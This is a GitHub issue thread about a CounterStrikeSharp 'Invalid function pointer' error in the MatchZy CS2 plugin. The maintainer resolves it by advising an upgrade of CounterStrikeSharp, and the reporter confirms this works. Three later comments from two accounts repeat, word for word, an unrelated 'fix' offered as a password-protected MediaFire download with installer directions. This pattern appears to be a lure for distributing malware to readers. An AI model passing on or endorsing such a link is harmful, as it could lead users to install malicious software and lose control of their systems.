### ISSUE TITLE
 Error invoking callback after  join to server

### ISSUE THREAD

**Issue by ZUBAT** [shobhit-pathak/MatchZy#221]
```
Using spawn points configuration 0x92ED0ADB
13:57:34 [EROR] (cssharp:Core) Error invoking callback
System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation.
 ---> CounterStrikeSharp.API.Core.NativeException: Invalid function pointer
   at CounterStrikeSharp.API.Core.NativeAPI.ExecuteVirtualFunction[T](IntPtr function, Object[] arguments) in /home/runner/work/CounterStrikeSharp/CounterStrikeSharp/managed/CounterStrikeSharp.API/Core/API.cs:line 1090
   at CounterStrikeSharp.API.Modules.Memory.DynamicFunctions.BaseMemoryFunction.InvokeInternalVoid(Object[] args) in /home/runner/work/CounterStrikeSharp/CounterStrikeSharp/managed/CounterStrikeSharp.API/Modules/Memory/DynamicFunctions/BaseMemoryFunction.cs:line 77
   at CounterStrikeSharp.API.Modules.Memory.DynamicFunctions.MemoryFunctionVoid`4.Invoke(T1 arg1, T2 arg2, T3 arg3, T4 arg4) in /home/runner/work/CounterStrikeSharp/CounterStrikeSharp/managed/CounterStrikeSharp.API/Modules/Memory/DynamicFunctions/MemoryFunctionVoid.cs:line 100
   at CounterStrikeSharp.API.Core.CBasePlayerController.SetPawn(CBasePlayerPawn pawn) in /home/runner/work/CounterStrikeSharp/CounterStrikeSharp/managed/CounterStrikeSharp.API/Core/Model/CBasePlayerController.cs:line 19
   at CounterStrikeSharp.API.Core.CCSPlayerController.Respawn() in /home/runner/work/CounterStrikeSharp/CounterStrikeSharp/managed/CounterStrikeSharp.API/Core/Model/CCSPlayerController.cs:line 139
   at InvokeStub_Action.Invoke(Object, Object, IntPtr*)
   at System.Reflection.MethodBaseInvoker.InvokeWithNoArgs(Object obj, BindingFlags invokeAttr)
   --- End of inner exception stack trace ---
   at System.Reflection.MethodBaseInvoker.InvokeWithNoArgs(Object obj, BindingFlags invokeAttr)
   at System.Delegate.DynamicInvokeImpl(Object[] args)
   at CounterStrikeSharp.API.Core.FunctionReference.<CreateWrappedCallback>b__18_0(fxScriptContext* context) in /home/runner/work/CounterStrikeSharp/CounterStrikeSharp/managed/CounterStrikeSharp.API/Core/FunctionReference.cs:line 100
```
css version

```
 CounterStrikeSharp was created and is maintained by Michael "roflmuffin" Wilson.
  Counter-Strike Sharp uses code borrowed from SourceMod, Source.Python, FiveM, Saul Rennison, source2gen and CS2Fixes.
  See ACKNOWLEDGEMENTS.md for more information.
  Current API Version: v253 (1.0.253+5644921)
```
matchzy verison
```
[#5:LOADED]: "MatchZy" (0.8.5) by WD- (https://github.com/shobhit-pathak/)
    A plugin for running and managing CS2 practice/pugs/scrims/matches!

```

**Comment by shobhit-pathak** [comment]
Hey!

I think CSS version is a problem here, can you try upgrading CSS to the latest one?
I'll also bundle the plugin with the latest CS# in the next update.

Thanks!

**Comment by ZUBAT** [comment]
Ty. its work for me

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
